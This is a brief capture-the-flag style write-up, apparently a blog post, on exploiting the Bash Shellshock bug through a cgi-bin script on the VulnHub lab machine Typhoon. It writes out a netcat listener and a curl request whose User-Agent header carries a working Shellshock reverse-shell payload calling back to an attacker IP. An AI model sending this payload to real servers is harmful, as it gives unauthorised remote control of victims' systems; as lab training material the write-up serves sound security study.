As it's known, cgi-bin is a directory that contains .cgi (Common Gateway Interface) command scripts, provide functionality with a web browser under certain conditions.
Regarding Shellshock, it is a bug in Bash (1.0.3 - 4.3) so that an attacker can gain access with arbitrary commands. This vulnerability can be easily exploited by an attacker.
The test command has been executed on vuln machiene Typhoon: https://www.vulnhub.com/entry/typhoon-102,267
> Shellshock vulnerability hassbeen detected via Nikto search.
> start the listener port first with netcat on local for Reverse Shell:
nc -lvp 4433
> Send a request via curl:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.28.164/4433 0>&1' http://192.168.28.175/cgi-bin/test.sh
first is attacker IP, the second one is victim's IP addresses.
It's seen that the environment of http-user-agent stores the user agent header, that functions for execution to exploit Shellshock:
Now, the usage of Shellshock opens a reverse shell on local sending request to the target to gain control over connection on bash.
Comments